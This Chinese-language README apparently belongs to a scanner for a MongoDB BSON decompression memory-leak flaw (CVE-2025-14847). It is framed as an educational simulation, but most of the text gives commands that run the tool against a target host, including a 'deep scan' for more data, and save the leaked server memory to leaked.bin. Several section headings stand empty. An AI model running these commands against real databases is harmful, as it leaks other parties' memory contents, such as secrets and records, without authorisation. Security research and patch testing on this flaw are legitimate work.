本仓库包含一个教育性研究工具,用于演示 CVE-2025-14847 背后的内存安全概念——这是一个在 MongoDB 的 BSON 解压实现中发现的严重漏洞。该工具模拟了解压过程中不恰当的边界检查如何导致内存泄露。
本工具演示了:
git clone https://github.com/InfoSecAntara/CVE-2025-14847-MongoDB.git
cd CVE-2025-14847-MongoDB
# 基本扫描(偏移量 20-8192)
python3 mongobleed.py --host <目标>
# 深度扫描以获取更多数据
python3 mongobleed.py --host <目标> --max-offset 50000
# 自定义范围
python3 mongobleed.py --host <目标> --min-offset 100 --max-offset 20000
此漏洞揭示了数据库安全中更广泛的问题:
官方资源:
| 选项 | 默认值 | 描述 |
|---|
--host | localhost | 目标 MongoDB 主机 |
--port | 27017 | 目标 MongoDB 端口 |
--min-offset | 20 | 探查的最小文档长度 |
--max-offset | 8192 | 探查的最大文档长度 |
--output | leaked.bin | 泄露数据的输出文件 |